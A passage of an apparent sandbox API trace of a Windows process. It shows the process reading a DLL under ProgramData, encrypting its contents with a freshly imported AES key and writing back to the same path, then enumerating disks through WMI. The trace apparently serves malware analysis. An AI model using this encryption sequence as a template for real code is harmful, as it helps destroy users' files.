"c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), fInfoLevelId=0x0, lpFileInformation=0x368edfc | out: lpFileInformation=0x368edfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd582ef5d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd582ef5d, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac4ff3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3e108)) returned 1 [0195.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f350) returned 1 [0195.828] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll", nBufferLength=0x105, lpBuffer=0x691ed94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll", lpFilePart=0x0) returned 0x30 [0195.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f288) returned 1 [0195.828] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x324 [0195.828] GetFileType (hFile=0x324) returned 0x1 [0195.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f284) returned 1 [0195.828] GetFileType (hFile=0x324) returned 0x1 [0195.828] GetFileSize (in: hFile=0x324, lpFileSizeHigh=0x691f390 | out: lpFileSizeHigh=0x691f390*=0x0) returned 0x3e108 [0195.830] ReadFile (in: hFile=0x324, lpBuffer=0x77f3cc8, nNumberOfBytesToRead=0x3e108, lpNumberOfBytesRead=0x691f33c, lpOverlapped=0x0 | out: lpBuffer=0x77f3cc8*, lpNumberOfBytesRead=0x691f33c*=0x3e108, lpOverlapped=0x0) returned 1 [0195.984] CloseHandle (hObject=0x324) returned 1 [0195.985] CryptAcquireContextW (in: phProv=0x691f2dc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f2dc*=0x66bb510) returned 1 [0195.991] CryptGenRandom (in: hProv=0x66bb510, dwLen=0x10, pbBuffer=0x366a5fc | out: pbBuffer=0x366a5fc) returned 1 [0196.427] CryptImportKey (in: hProv=0x66bb510, pbData=0x363d1a4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f2ac | out: phKey=0x691f2ac*=0xb7f490) returned 1 [0196.427] CryptContextAddRef (hProv=0x66bb510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.428] CryptContextAddRef (hProv=0x66bb510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.428] CryptDuplicateKey (in: hKey=0xb7f490, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f29c | out: phKey=0x691f29c*=0xb7f4d0) returned 1 [0196.428] CryptContextAddRef (hProv=0x66bb510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0196.428] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x4, pbData=0x363d284*=0x1, dwFlags=0x0) returned 1 [0196.428] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x1, pbData=0x363d250, dwFlags=0x0) returned 1 [0196.429] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x7a97a20*, pdwDataLen=0x691f308*=0x3e110, dwBufLen=0x3e110 | out: pbData=0x7a97a20*, pdwDataLen=0x691f308*=0x3e110) returned 1 [0196.431] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363d2ac*, pdwDataLen=0x691f310*=0x0, dwBufLen=0x10 | out: pbData=0x363d2ac*, pdwDataLen=0x691f310*=0x10) returned 1 [0196.432] CryptDestroyKey (hKey=0xb7f490) returned 1 [0196.432] CryptReleaseContext (hProv=0x66bb510, dwFlags=0x0) returned 1 [0196.432] CryptReleaseContext (hProv=0x66bb510, dwFlags=0x0) returned 1 [0196.432] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll", nBufferLength=0x105, lpBuffer=0x691ed80, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll", lpFilePart=0x0) returned 0x30 [0196.432] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f274) returned 1 [0196.432] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\ppcrlui.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4a8 [0196.434] GetFileType (hFile=0x4a8) returned 0x1 [0196.434] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f270) returned 1 [0196.434] GetFileType (hFile=0x4a8) returned 0x1 [0196.435] WriteFile (in: hFile=0x4a8, lpBuffer=0x363d8a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x691f304, lpOverlapped=0x0 | out: lpBuffer=0x363d8a4*, lpNumberOfBytesWritten=0x691f304*=0x20, lpOverlapped=0x0) returned 1 [0196.435] CloseHandle (hObject=0x4a8) returned 1 [0196.435] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0196.435] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0196.435] CoTaskMemFree (pv=0xbed438) [0196.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x691ed68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0196.435] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f2b0 | out: ppv=0x691f2b0*=0xb51e34) returned 0x0 [0196.436] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f2a8 | out: pAptType=0x691f2a8*=1) returned 0x0 [0196.436] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f2ac | out: ppvObject=0x691f2ac*=0x0) returned 0x80004002 [0196.436] IUnknown:Release (This=0xb51e34) returned 0x1 [0196.436] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ec18 | out: ppv=0x691ec18*=0x60276e0) returned 0x0 [0196.437] WbemDefPath:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ee30 | out: ppvObject=0x691ee30*=0x0) returned 0x80004002 [0196.437] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60276e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ee44 | out: ppvObject=0x691ee44*=0x60313c0) returned 0x0 [0196.437] WbemDefPath:IUnknown:Release (This=0x60276e0) returned 0x0 [0196.437] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea64 | out: ppvObject=0x691ea64*=0x60313c0) returned 0x0 [0196.437] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ea20 | out: ppvObject=0x691ea20*=0x0) returned 0x80004002 [0196.440] WbemDefPath:IUnknown:AddRef (This=0x60313c0) returned 0x3 [0196.440] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e37c | out: ppvObject=0x691e37c*=0x0) returned 0x80004002 [0196.440] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e32c | out: ppvObject=0x691e32c*=0x0) returned 0x80004002 [0196.440] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e338 | out: ppvObject=0x691e338*=0xbe2550) returned 0x0 [0196.440] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2550, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e340 | out: pCid=0x691e340*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.440] WbemDefPath:IUnknown:Release (This=0xbe2550) returned 0x3 [0196.440] CoGetContextToken (in: pToken=0x691e398 | out: pToken=0x691e398) returned 0x0 [0196.440] CoGetContextToken (in: pToken=0x691e7a0 | out: pToken=0x691e7a0) returned 0x0 [0196.440] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e830 | out: ppvObject=0x691e830*=0x0) returned 0x80004002 [0196.440] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x2 [0196.440] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x1 [0196.440] CoGetContextToken (in: pToken=0x691f128 | out: pToken=0x691f128) returned 0x0 [0196.440] CoGetContextToken (in: pToken=0x691f088 | out: pToken=0x691f088) returned 0x0 [0196.440] WbemDefPath:IUnknown:QueryInterface (in: This=0x60313c0, riid=0x691f158*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f154 | out: ppvObject=0x691f154*=0x60313c0) returned 0x0 [0196.440] WbemDefPath:IUnknown:AddRef (This=0x60313c0) returned 0x3 [0196.440] WbemDefPath:IUnknown:Release (This=0x60313c0) returned 0x2 [0196.440] WbemDefPath:IWbemPath:SetText (This=0x60313c0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.440] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0196.440] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f2d8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d8*=0x20, pszText=0x0) returned 0x0 [0196.440] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f2d8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0196.440] WbemDefPath:IWbemPath:GetInfo (in: This=0x60313c0, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0196.440] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0196.441] WbemDefPath:IWbemPath:GetInfo (in: This=0x60313c0, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0196.441] WbemDefPath:IWbemPath:GetInfo (in: This=0x60313c0, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0196.441] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x691f25c | out: puCount=0x691f25c*=0x0) returned 0x0 [0196.441] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x691f248 | out: puCount=0x691f248*=0x2) returned 0x0 [0196.441] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0x0, pszText=0x0 | out: puBuffLength=0x691f244*=0xf, pszText=0x0) returned 0x0 [0196.441] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f244*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.441] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f1f8 | out: ppv=0x691f1f8*=0xb51e34) returned 0x0 [0196.441] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f1f0 | out: pAptType=0x691f1f0*=1) returned 0x0 [0196.441] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f1f4 | out: ppvObject=0x691f1f4*=0x0) returned 0x80004002 [0196.441] IUnknown:Release (This=0xb51e34) returned 0x1 [0196.442] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691eb60 | out: ppv=0x691eb60*=0x60278f0) returned 0x0 [0196.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x60278f0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ed78 | out: ppvObject=0x691ed78*=0x0) returned 0x80004002 [0196.442] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60278f0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ed8c | out: ppvObject=0x691ed8c*=0x6031430) returned 0x0 [0196.442] WbemDefPath:IUnknown:Release (This=0x60278f0) returned 0x0 [0196.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9ac | out: ppvObject=0x691e9ac*=0x6031430) returned 0x0 [0196.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691e968 | out: ppvObject=0x691e968*=0x0) returned 0x80004002 [0196.442] WbemDefPath:IUnknown:AddRef (This=0x6031430) returned 0x3 [0196.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e2c4 | out: ppvObject=0x691e2c4*=0x0) returned 0x80004002 [0196.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e274 | out: ppvObject=0x691e274*=0x0) returned 0x80004002 [0196.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e280 | out: ppvObject=0x691e280*=0xbe2430) returned 0x0 [0196.442] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2430, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e288 | out: pCid=0x691e288*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0196.442] WbemDefPath:IUnknown:Release (This=0xbe2430) returned 0x3 [0196.442] CoGetContextToken (in: pToken=0x691e2e0 | out: pToken=0x691e2e0) returned 0x0 [0196.442] CoGetContextToken (in: pToken=0x691e6e8 | out: pToken=0x691e6e8) returned 0x0 [0196.442] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e778 | out: ppvObject=0x691e778*=0x0) returned 0x80004002 [0196.442] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x2 [0196.443] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x1 [0196.443] CoGetContextToken (in: pToken=0x691f070 | out: pToken=0x691f070) returned 0x0 [0196.443] CoGetContextToken (in: pToken=0x691efd0 | out: pToken=0x691efd0) returned 0x0 [0196.443] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031430, riid=0x691f0a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f09c | out: ppvObject=0x691f09c*=0x6031430) returned 0x0 [0196.443] WbemDefPath:IUnknown:AddRef (This=0x6031430) returned 0x3 [0196.443] WbemDefPath:IUnknown:Release (This=0x6031430) returned 0x2 [0196.443] WbemDefPath:IWbemPath:SetText (This=0x6031430, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0196.443] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031430, puCount=0x691f220 | out: puCount=0x691f220*=0x2) returned 0x0 [0196.443] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x691f21c*=0x0, pszText=0x0 | out: puBuffLength=0x691f21c*=0xf, pszText=0x0) returned 0x0 [0196.443] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x691f21c*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f21c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.443] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f220 | out: ppv=0x691f220*=0xb51e34) returned 0x0 [0196.443] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f218 | out: pAptType=0x691f218*=1) returned 0x0 [0196.443] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f21c | out: ppvObject=0x691f21c*=0x0) returned 0x80004002 [0196.443] IUnknown:Release (This=0xb51e34) returned 0x1 [0196.444] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ee40 | out: ppv=0x691ee40*=0x60248d8) returned 0x0 [0196.444] WbemLocator:IUnknown:QueryInterface (in: This=0x60248d8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691f058 | out: ppvObject=0x691f058*=0x0) returned 0x80004002 [0196.444] WbemLocator:IClassFactory:CreateInstance (in: This=0x60248d8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f06c | out: ppvObject=0x691f06c*=0x6027900) returned 0x0 [0196.444] WbemLocator:IUnknown:Release (This=0x60248d8) returned 0x0 [0196.444] WbemLocator:IUnknown:QueryInterface (in: This=0x6027900, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ec8c | out: ppvObject=0x691ec8c*=0x6027900) returned 0x0 [0196.444] WbemLocator:IUnknown:QueryInterface (in: This=0x6027900, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ec48 | out: ppvObject=0x691ec48*=0x0) returned 0x80004002 [0196.444] WbemLocator:IUnknown:AddRef (This=0x6027900) returned 0x3 [0196.444] WbemLocator:IUnknown:QueryInterface (in: This=0x6027900, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e5a4 | out: ppvObject=0x691e5a4*=0x0) returned 0x80004002 [0196.444] WbemLocator:IUnknown:QueryInterface (in: This=0x6027900, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e554 | out: ppvObject=0x691e554*=0x0) returned 0x80004002 [0196.444] WbemLocator:IUnknown:QueryInterface (in: This=0x6027900, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e560 | out: ppvObject=0x691e560*=0x0) returned 0x80004002 [0196.444] CoGetContextToken (in: pToken=0x691e5c0 | out: pToken=0x691e5c0) returned 0x0 [0196.444] CoGetContextToken (in: pToken=0x691e9c8 | out: pToken=0x691e9c8) returned 0x0 [0196.444] WbemLocator:IUnknown:QueryInterface (in: This=0x6027900, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea58 | out: ppvObject=0x691ea58*=0x0) returned 0x80004002 [0196.444] WbemLocator:IUnknown:Release (This=0x6027900) returned 0x2 [0196.444] WbemLocator:IUnknown:Release (This=0x6027900) returned 0x1 [0196.444] CoGetContextToken (in: pToken=0x691f038 | out: pToken=0x691f038) returned 0x0 [0196.444] CoGetContextToken (in: pToken=0x691ef98 | out: pToken=0x691ef98) returned 0x0 [0196.444] WbemLocator:IUnknown:QueryInterface (in: This=0x6027900, riid=0x691f068*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x691f064 | out: ppvObject=0x691f064*=0x6027900) returned 0x0 [0196.444] WbemLocator:IUnknown:AddRef (This=0x6027900) returned 0x3 [0196.444] WbemLocator:IUnknown:Release (This=0x6027900) returned 0x2 [0196.444] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031430, puCount=0x691f1fc | out: puCount=0x691f1fc*=0x2) returned 0x0 [0196.444] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=8, puBuffLength=0x691f1f8*=0x0, pszText=0x0 | out: puBuffLength=0x691f1f8*=0xf, pszText=0x0) returned 0x0 [0196.444] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=8, puBuffLength=0x691f1f8*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f1f8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.444] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x691f0d4 | out: ppv=0x691f0d4*=0x6027910) returned 0x0 [0196.445] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027910, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x691f168 | out: ppNamespace=0x691f168*=0x60335dc) returned 0x0 [0197.188] WbemLocator:IUnknown:QueryInterface (in: This=0x60335dc, riid=0x749b1104*(Data1=0x13d, 